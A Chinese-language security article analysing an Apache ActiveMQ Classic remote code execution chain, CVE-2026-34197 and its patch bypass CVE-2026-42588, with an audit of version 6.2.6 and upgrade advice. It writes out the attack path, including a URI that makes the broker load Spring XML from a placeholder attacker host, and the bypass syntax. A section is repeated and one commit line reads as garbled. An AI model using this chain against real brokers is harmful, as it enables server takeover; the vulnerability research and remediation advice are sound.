文章总结: 该文档详细分析了ApacheActiveMQClassic中JolokiaaddNetworkConnector到xbean/Spring-XML的远程代码执行链,复现了CVE-2026-34197并发现其补丁绕过CVE-2026-42588。审计显示6.2.6版本已封堵主RCE链,但存在SSRF、IDOR等中低危问题。建议立即升级至6.2.6版本,限制Jolokia访问并禁用不必要的管理操作。 综合评分: 89 文章分类: 漏洞分析,威胁情报,恶意软件,红队,安全工具
Apache ActiveMQ Classic 重大 RCE 研究:CVE-2026-34197 及其补丁绕过 CVE-2026-42588 全解析
Ots安全
2026年7月6日 10:17 广东
在小说阅读器读本章
去阅读
威胁简报
恶意软件
漏洞攻击
今天为大家带来一篇重量级技术分析——Apache ActiveMQ Classic 中那条潜伏多年的 Jolokia → addNetworkConnector → xbean/Spring-XML 远程代码执行链 的完整研究拆解。这份研究不仅复现了 CVE-2026-34197,还发现了其官方补丁的绕过方式 CVE-2026-42588,并对强化后的 6.2.6 版本进行了全面审计,同时与 Crowdfense 的公开绕过文章做了并排对比。所有测试均在本地实验室(Docker/自托管)环境下完成,严格使用占位符攻击者主机,不包含任何真实恶意payload。
一、漏洞核心原理(一句话版)
已认证的 Jolokia 调用者(6.0.0–6.1.1 版本因 CVE-2024-32114 可未授权)通过 BrokerView.addNetworkConnector(uri),传入精心构造的发现 URI(如 vm://…?brokerConfig=xbean:
POST /api/jolokia/
→ BrokerView.addNetworkConnector(String)
→ static:(vm://evil?brokerConfig=xbean:http://ATTACKER/evil.xml)
→ VMTransportFactory 动态创建 Broker
→ XBeanBrokerFactory
→ ResourceXmlApplicationContext 加载 Spring XML
→ ProcessBuilder Bean → RCE
二、已证实的 exploitation 链
CVE-2026-34197 Jolokia addNetworkConnector → xbean Spring-XML RCE
RCE 严重 认证后(早期版本未授权) uid=0 实测成功(5.18.3/5.18.6/6.1.4/6.1.7)
CVE-2026-42588 无括号复合 URI 绕过拒绝列表 RCE(补丁绕过)
严重 认证后 uid=0 实测成功(已打 34197 补丁的 5.19.6 + 6.2.0)
CVE-2026-42253MessageServlet 头部注入 → 存储型 XSS
XSS 中等 认证后 6.2.0 版本在线验证
三、6.2.6 强化版全面审计
发现6.2.6 版本已有效封堵主 RCE 链,但仍存在一批中低危问题(均经源码验证):
-
C1:static:静止的: 拒绝列表绕过 → SSRF(可发起出站 TCP 连接)
-
B1:持久订阅跨 clientId 删除 IDOR
-
B3:LDAP 空密码导致匿名绑定
-
A1–A7:控制台输出编码注入家族(MessageId.textView 等)
-
B2/B4/B5/B6/B7:权限绕过、身份冲突、欺骗等配置相关问题
-
F5:STOMP 出站头部帧注入
重要提醒:6.2.6 已无新的未授权 RCE,风险主要转移到授权控制和输出编码领域。
四、与 Crowdfense 绕过文章对比
两者均针对同一攻击链,均识别出三层防御。核心差异在第二层绕过:
- 层1(方案拒绝列表):双方均使用无括号复合 static:(vm://…) 独立发现绕过。
- 层2(xbean 允许列表):Crowdfense 使用百分号编码 + Windows UNC/WebDAV 实现完全远程(无需本地写);本研究使用 xbean:/tmp/evil.xml(需本地写权限,Linux 环境)。
- 层3(VMTransportFactory 方案门):6.2.6 已彻底封堵。
Crowdfense 的 Windows 特定技巧在 Linux 上不可复现,但在 Windows 5.19.6 等版本配合 SMB/WebDAV 仍可能实现完全远程绕过。
四、与 Crowdfense 绕过文章对比
两者均针对同一攻击链,均识别出三层防御。核心差异在第二层绕过:
- 层1(方案拒绝列表):双方均使用无括号复合 static:(vm://…) 独立发现绕过。
- 层2(xbean 允许列表):Crowdfense 使用百分号编码 + Windows UNC/WebDAV 实现完全远程(无需本地写);本研究使用 xbean:/tmp/evil.xml(需本地写权限,Linux 环境)。
- 层3(VMTransportFactory 方案门):6.2.6 已彻底封堵。
Crowdfense 的 Windows 特定技巧在 Linux 上不可复现,但在 Windows 5.19.6 等版本配合 SMB/WebDAV 仍可能实现完全远程绕过。
五、官方修复措施(6.2.6)
三个关键提交彻底关闭了该链:
c1b44af11:无条件解析复合 URI 并递归处理
c2fc7a1d6:VMTransportFactory 默认阻断 XBeanBrokerFactory
c2fc7a1d6:VMTransportFactory 暂时爆发
be8415f24:示例配置强化(Jolokia 绑定 loopback + 操作拒绝列表)
强烈建议:
- 立即升级至 ActiveMQ Classic 6.2.6 或更高版本
- 生产环境将 Jolokia 限制在 loopback 或严格访问控制
- 禁用不必要的 addNetworkConnector 等管理操作
- 审查 Shiro、LDAP 等认证配置
这份研究仓库(https://github.com/dinosn/apache-activemq-rce-research)已公开目录结构和审计报告。
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《Apache ActiveMQ Classic 重大 RCE 研究:CVE-2026-34197 及其补丁绕过 CVE-2026-42588 全解析》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论